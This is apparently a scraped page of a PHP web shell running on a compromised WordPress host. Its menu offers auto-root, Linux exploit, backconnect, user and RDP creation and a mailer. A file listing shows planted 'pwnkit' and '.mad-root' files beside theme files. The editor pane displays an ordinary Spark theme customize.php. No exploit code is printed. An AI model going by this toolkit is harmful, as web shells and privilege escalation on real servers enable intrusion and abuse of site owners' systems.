Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
spark /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin-style.css
8.8
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
customize.php
17.72
KB
-rw-r--r--
d5-themes.php
3.86
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
theme-about.php
7.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : customize.php
<?php function spark_customize_register($wp_customize){ $wp_customize->add_section('spark_options', array( 'priority' => 10, 'capability' => 'edit_theme_options', 'title' => __('SPARK OPTIONS', 'spark'), 'description' => '<div class="infohead"><span class="donation">A Theme is an effort of many sleepless nights of the Developers. If you like this FREEE Theme You can consider for a 5 star rating and honest review. Your review will inspire us. You can <a href="https://wordpress.org/support/view/theme-reviews/spark" target="_blank"><strong>Review Here</strong></a>.</span><br /><br /><br /><span class="donation"> Need More Features and Options including 3D Slides, Unlimited Slide Images, Links from Featured Boxes and 100+ Advanced Features and Controls? Try <a href="'.esc_url('http://d5creation.com/theme/spark/').'" target="_blank"><strong>SPARK Extend</strong></a></span><br /> <br /><br /><span class="donation"> You can Visit the SPARK Extend <a href="'.esc_url('http://demo.d5creation.com/themes/?theme=SPARK').'" target="_blank"><strong>DEMO 1</strong></a> and <a href="'.esc_url('http://demo.d5creation.com/themes/?theme=SPARK-2').'" target="_blank"><strong>DEMO 2</strong></a></span></div>' )); // Front Page Heading $wp_customize->add_setting('spark[heading_text]', array( 'default' => __('Welcome to the SPARK WordPress Theme!','spark'), 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_textarea', 'type' => 'option' )); $wp_customize->add_control('spark_heading_text' , array( 'label' => __('Front Page Heading', 'spark'), 'section' => 'spark_options', 'settings' => 'spark[heading_text]' )); // Front Page Heading Description $wp_customize->add_setting('spark[heading_des]', array( 'default' => __('You can use SPARK Extend Theme for more options, more functions and more visual elements. Extend Version has come with simple color customization option','spark'), 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_textarea', 'type' => 'option' )); $wp_customize->add_control('spark_heading_des' , array( 'label' => __('Front Page Heading Description', 'spark'), 'section' => 'spark_options', 'settings' => 'spark[heading_des]', 'type' => 'textarea' )); // Banner Image/ Slide Image 01 $wp_customize->add_setting('spark[slide-image1]', array( 'default' => get_template_directory_uri() . '/images/slide-image/slide-image1.jpg', 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_url', 'type' => 'option' )); $wp_customize->add_control( new WP_Customize_Image_Control($wp_customize, 'slide-image1', array( 'label' => __('Banner Image', 'spark'), 'section' => 'spark_options', 'settings' => 'spark[slide-image1]', 'description' => __('Upload a Banner Image. 1050px X 400px image is recommended','spark') ))); // First Row Subject $wp_customize->add_setting('spark[featuredr-title]', array( 'default' => __('Recent Works', 'spark'), 'sanitize_callback' => 'esc_textarea', 'capability' => 'edit_theme_options', 'type' => 'option' )); $wp_customize->add_control('spark_featuredr-title', array( 'label' => __('Input your Row Title Heret', 'spark'), 'section' => 'spark_options', 'settings' => 'spark[featuredr-title]', 'description' => __('Input your Row Title Here','spark') )); // First Row Description $wp_customize->add_setting('spark[featuredr-description]', array( 'default' => __('The Color changing options of SPARK will give the WordPress Driven Site an attractive look', 'spark'), 'sanitize_callback' => 'esc_textarea', 'capability' => 'edit_theme_options', 'type' => 'option' )); $wp_customize->add_control('spark_featuredr-description', array( 'label' => __('Row Description', 'spark'), 'section' => 'spark_options', 'settings' => 'spark[featuredr-description]', 'description' => __('Input the description of Featured Areas. Please limit the words within 30 so that the layout should be clean and attractive. You can also input any HTML, Videos or iframe here. But please keep in mind about the limitation of width of the box','spark'), 'type' => 'textarea' )); $fbsin=array("1","2","3"); foreach ($fbsin as $fbsinumber) { // Featured Image $wp_customize->add_setting('spark[featured-image'. $fbsinumber .']', array( 'default' => get_template_directory_uri() . '/images/featured-image' . $fbsinumber . '.jpg', 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_url', 'type' => 'option' )); $wp_customize->add_control( new WP_Customize_Image_Control($wp_customize, 'featured-image'. $fbsinumber, array( 'label' => __('First Row Featured Image', 'spark') . '-' . $fbsinumber, 'section' => 'spark_options', 'settings' => 'spark[featured-image'. $fbsinumber .']', 'description' => __('Upload an image for the Featured Box. 230px X 115px image is recommended','spark') ))); // Featured Image Title $wp_customize->add_setting('spark[featured-title' . $fbsinumber . ']', array( 'default' => __('SPARK Theme for Small Business','spark'), 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_textarea', 'type' => 'option' )); $wp_customize->add_control('spark_featured-title' . $fbsinumber, array( 'label' => __('Title', 'spark'). '-' . $fbsinumber, 'section' => 'spark_options', 'settings' => 'spark[featured-title' . $fbsinumber .']' )); // Featured Image Description $wp_customize->add_setting('spark[featured-description' . $fbsinumber . ']', array( 'default' => __('The Color changing options of SPARK will give the WordPress Driven Site an attractive look. SPARK is super elegant and Professional Responsive Theme which will create the business widely expressed','spark'), 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_textarea', 'type' => 'option' )); $wp_customize->add_control('spark_featured-description' . $fbsinumber , array( 'label' => __('Description', 'spark') . '-' . $fbsinumber, 'section' => 'spark_options', 'settings' => 'spark[featured-description' . $fbsinumber .']', 'type' => 'textarea' )); } // Show Second Row Featured Boxs $wp_customize->add_setting('spark[srfbox]', array( 'default' => '1', 'sanitize_callback' => 'esc_html', 'capability' => 'edit_theme_options', 'type' => 'option' )); $wp_customize->add_control('spark_srfbox', array( 'label' => __('Show Second Row Featured Boxs', 'spark'), 'section' => 'spark_options', 'settings' => 'spark[srfbox]', 'description' => __('Uncheck this if you do not want to show the Second Row Featured Boxs','spark'), 'type' => 'checkbox' )); // Second Row Subject $wp_customize->add_setting('spark[featuredrsecond-title]', array( 'default' => __('Our Services', 'spark'), 'sanitize_callback' => 'esc_textarea', 'capability' => 'edit_theme_options', 'type' => 'option' )); $wp_customize->add_control('spark_featuredrsecond-title', array( 'label' => __('Row Subject', 'spark'), 'section' => 'spark_options', 'settings' => 'spark[featuredrsecond-title]', 'description' => __('Input your Row Title Here','spark') )); // Second Row Description $wp_customize->add_setting('spark[featuredrsecond-description]', array( 'default' => __('SPARK is super elegant and Professional Responsive Theme which will create the business widely expressed', 'spark'), 'sanitize_callback' => 'esc_textarea', 'capability' => 'edit_theme_options', 'type' => 'option' )); $wp_customize->add_control('spark_featuredrsecond-description', array( 'label' => __('Second Row Description', 'spark'), 'section' => 'spark_options', 'settings' => 'spark[featuredrsecond-description]', 'description' => __('Input the description of Featured Areas. Please limit the words within 30 so that the layout should be clean and attractive','spark'), 'type' => 'textarea' )); foreach (range(1, 3) as $fbsinumber) { // Featured Image Title $wp_customize->add_setting('spark[featured-title2' . $fbsinumber . ']', array( 'default' => __('SPARK Theme for Business','spark'), 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_textarea', 'type' => 'option' )); $wp_customize->add_control('spark_featured-title2' . $fbsinumber, array( 'label' => __('Title', 'spark'). '-' . $fbsinumber, 'section' => 'spark_options', 'settings' => 'spark[featured-title2' . $fbsinumber .']' )); // Featured Image Description $wp_customize->add_setting('spark[featured-description2' . $fbsinumber . ']', array( 'default' => __('SPARK is super elegant and Professional Responsive Theme which will create the business widely expressed. The Color changing options of SPARK will give the WordPress Driven Site an attractive look','spark'), 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_textarea', 'type' => 'option' )); $wp_customize->add_control('spark_featured-description2' . $fbsinumber , array( 'label' => __('Description', 'spark') . '-' . $fbsinumber, 'section' => 'spark_options', 'settings' => 'spark[featured-description2' . $fbsinumber .']', 'type' => 'textarea' )); } // Staff Box Heading $wp_customize->add_setting('spark[staffboxes-heading]', array( 'default' => __('WE ARE INSIDE','spark'), 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_textarea', 'type' => 'option' )); $wp_customize->add_control('spark_staffboxes-heading' , array( 'label' => __('Staff Boxes Heading', 'spark'), 'section' => 'spark_options', 'settings' => 'spark[staffboxes-heading]' )); // Staff Box Description $wp_customize->add_setting('spark[staffboxes-heading-des]', array( 'default' => __('Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua','spark'), 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_textarea', 'type' => 'option' )); $wp_customize->add_control('spark_staffboxes-heading-des' , array( 'label' => __('Staff Boxes Heading Description', 'spark'), 'section' => 'spark_options', 'settings' => 'spark[staffboxes-heading-des]', 'type' => 'textarea' )); // Staff Boxes foreach (range(1, 3 ) as $staffboxsnumber) { // Staff Box Image $wp_customize->add_setting('spark[staffboxes-image' . $staffboxsnumber .']', array( 'default' => get_template_directory_uri() . '/images/stf'. $staffboxsnumber . '.jpg', 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_url', 'type' => 'option' )); $wp_customize->add_control( new WP_Customize_Image_Control($wp_customize, 'staffboxes-image' . $staffboxsnumber, array( 'label' => __('Staff Image', 'spark') . '-' .$staffboxsnumber , 'section' => 'spark_options', 'settings' => 'spark[staffboxes-image' . $staffboxsnumber .']', 'description' => __('Uoload the Staff Image. The Sample Image is 300px X 200px','spark') ))); // Staff Box Title $wp_customize->add_setting('spark[staffboxes-title' . $staffboxsnumber . ']', array( 'default' => __('OUR PROJECT ', 'spark'). $staffboxsnumber, 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_textarea', 'type' => 'option' )); $wp_customize->add_control('spark_staffboxes-title' . $staffboxsnumber, array( 'label' => __('Staff Name', 'spark'). '-' . $staffboxsnumber, 'section' => 'spark_options', 'settings' => 'spark[staffboxes-title' . $staffboxsnumber .']' )); // Staff Box Caption $wp_customize->add_setting('spark[staffboxes-description' . $staffboxsnumber . ']', array( 'default' => __('Innovation Lite is a Professional Responsive Theme','spark'), 'capability' => 'edit_theme_options', 'sanitize_callback' => 'esc_textarea', 'type' => 'option' )); $wp_customize->add_control('spark_staffboxes-description' . $staffboxsnumber, array( 'label' => __('Staff Designation', 'spark'). '-' . $staffboxsnumber, 'section' => 'spark_options', 'settings' => 'spark[staffboxes-description' . $staffboxsnumber .']', 'type' => 'textarea' )); $wp_customize->add_setting('spark[staffboxes-linka' . $staffboxsnumber .']', array( 'default' => 'https://wordpress.org/themes/author/d5creation', 'sanitize_callback' => 'esc_url', 'capability' => 'edit_theme_options', 'type' => 'option' )); $wp_customize->add_control('spark_staffboxes-linka' . $staffboxsnumber, array( 'label' => __('Staff Social Links - ', 'spark'). $staffboxsnumber, 'section' => 'spark_options', 'settings' => 'spark[staffboxes-linka' . $staffboxsnumber .']', 'description' => __('Input Your Social Page Link. Example: <b>https://wordpress.org/themes/author/d5creation</b>. If you do not want to show anything here leave the box blank. Supported Links are: wordpress.org, wordpress.com, dribbble.com, github.com, tumblr.com, youtube.com, flickr.com, vimeo.com, codepen.io, linkedin.com', 'spark'), )); $wp_customize->add_setting('spark[staffboxes-linkb' . $staffboxsnumber .']', array( 'default' => 'https://wordpress.org/themes/author/d5creation', 'sanitize_callback' => 'esc_url', 'capability' => 'edit_theme_options', 'type' => 'option' )); $wp_customize->add_control('spark_staffboxes-linkb' . $staffboxsnumber, array( 'section' => 'spark_options', 'settings' => 'spark[staffboxes-linkb' . $staffboxsnumber .']', )); $wp_customize->add_setting('spark[staffboxes-linkc' . $staffboxsnumber .']', array( 'default' => 'https://wordpress.org/themes/author/d5creation', 'sanitize_callback' => 'esc_url', 'capability' => 'edit_theme_options', 'type' => 'option' )); $wp_customize->add_control('spark_staffboxes-linkc' . $staffboxsnumber, array( 'section' => 'spark_options', 'settings' => 'spark[staffboxes-linkc' . $staffboxsnumber .']', )); $wp_customize->add_setting('spark[staffboxes-link' . $staffboxsnumber .']', array( 'default' => 'https://wordpress.org/themes/author/d5creation', 'sanitize_callback' => 'esc_url', 'capability' => 'edit_theme_options', 'type' => 'option' )); $wp_customize->add_control('spark_staffboxes-link' . $staffboxsnumber, array( 'label' => __('Profile Link - ', 'spark'). $staffboxsnumber, 'section' => 'spark_options', 'settings' => 'spark[staffboxes-link' . $staffboxsnumber .']', 'description' => __('Input Your Profile Page Link here','spark'), )); } // Social Links foreach (range(1, 5 ) as $numslinksn) { $wp_customize->add_setting('spark[sl' . $numslinksn .']', array( 'default' => 'https://wordpress.org/themes/author/d5creation', 'sanitize_callback' => 'esc_url', 'capability' => 'edit_theme_options', 'type' => 'option' )); $wp_customize->add_control('spark_sl' . $numslinksn, array( 'label' => __('Social Link - ', 'spark'). $numslinksn, 'section' => 'spark_options', 'settings' => 'spark[sl' . $numslinksn .']', 'description' => __('Input Your Social Page Link. Example: <b>http://wordpress.org/d5creation</b>. If you do not want to show anything here leave the box blank. Supported Links are: wordpress.org, wordpress.com, dribbble.com, github.com, tumblr.com, youtube.com, flickr.com, vimeo.com, codepen.io, linkedin.com', 'spark'), )); } } add_action('customize_register', 'spark_customize_register'); if ( ! function_exists( 'spark_get_option' ) ) : function spark_get_option( $spark_name, $spark_default = false ) { $spark_config = get_option( 'spark' ); if ( ! isset( $spark_config ) ) : return $spark_default; else: $spark_options = $spark_config; endif; if ( isset( $spark_options[$spark_name] ) ): return $spark_options[$spark_name]; else: return $spark_default; endif; } endif;
Close